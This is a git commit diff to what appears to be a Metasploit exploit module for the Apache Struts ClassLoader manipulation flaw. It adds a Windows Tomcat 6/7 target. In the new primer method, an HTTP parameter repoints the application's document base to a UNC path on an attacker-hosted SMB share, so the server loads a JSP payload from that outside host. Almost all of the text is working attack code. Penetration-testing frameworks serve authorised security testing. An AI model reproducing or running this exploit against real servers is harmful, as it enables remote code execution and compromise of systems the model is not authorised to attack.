Add support for tomcat 7 to struts_code_exec_classloader

2015-03-05 15:40:24 -06:00 · 2015-03-05 15:40:24 -06:00 · e1a4b046a0
parent fef8b89001
commit e1a4b046a0
1 changed files with 51 additions and 9 deletions
--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@ -8,9 +8,10 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking # It's going to manipulate the Class Loader

-  include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::SMB::Server::Share

  def initialize(info = {})
    super(update_info(info,
@ -27,7 +28,8 @@ class Metasploit3 < Msf::Exploit::Remote
        [
          'Mark Thomas', # Vulnerability Discovery
          'Przemyslaw Celej', # Vulnerability Discovery
-          'Redsadic <julian.vilas[at]gmail.com>' # Metasploit Module
+          'Redsadic <julian.vilas[at]gmail.com>', # Metasploit Module
+          'Matthew Hall <hallm[at]sec-1.com>' # SMB target
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
@ -46,6 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
          'Space' => 5000,
          'DisableNops' => true
        },
+      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Targets'        =>
        [
          ['Java',
@ -65,17 +68,28 @@ class Metasploit3 < Msf::Exploit::Remote
              'Arch'     => ARCH_X86,
              'Platform' => 'win'
            }
+          ],
+          ['Windows / Tomcat 6 & 7 (Remote SMB Resource)',
+            {
+              'Arch'     => ARCH_JAVA,
+              'Platform' => 'win'
+            }
          ]
        ],
      'DisclosureDate' => 'Mar 06 2014',
      'DefaultTarget'  => 1))

-      register_options(
-        [
-          Opt::RPORT(8080),
-          OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"]),
-          OptEnum.new('STRUTS_VERSION', [ true, 'Apache Struts Framework version', '2.x', ['1.x','2.x']])
-        ], self.class)
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptEnum.new('STRUTS_VERSION', [ true, 'Apache Struts Framework version', '2.x', ['1.x','2.x']]),
+        OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"]),
+        OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 10]),
+        OptString.new('FILE_NAME', [ true, 'The JSP file with the payload (target dependant)', 'HelloWorld.jsp']),
+        OptString.new('FOLDER_NAME', [ true, 'The Folder where the JSP payload lives (target dependant)', 'example'])
+      ], self.class)
+
+    deregister_options('FILE_CONTENTS')
  end

  def jsp_dropper(file, exe)
@ -199,6 +213,34 @@ class Metasploit3 < Msf::Exploit::Remote
  end

  def exploit
+    if target.name =~ /Remote SMB Resource/
+      begin
+        Timeout.timeout(datastore['SMB_DELAY']) { super }
+      rescue Timeout::Error
+        # do nothing... just finish exploit and stop smb server...
+      end
+    else
+      class_loader_exploit
+    end
+  end
+
+  # Used with SMB targets
+  def primer
+    self.file_contents = payload.encoded
+    print_status("File available on #{unc}...")
+
+    print_status("#{peer} - Modifying Class Loader...")
+    send_request_cgi({
+      'uri'     => normalize_uri(target_uri.path.to_s),
+      'version' => '1.1',
+      'method'  => 'GET',
+      'vars_get' => {
+        'class.classLoader.resources.dirContext.docBase' => "\\\\#{srvhost}\\#{share}"
+      }
+    })
+  end
+
+  def class_loader_exploit
    prefix_jsp = rand_text_alphanumeric(3+rand(3))
    date_format = rand_text_numeric(1+rand(4))
    @jsp_file = prefix_jsp + date_format + ".jsp"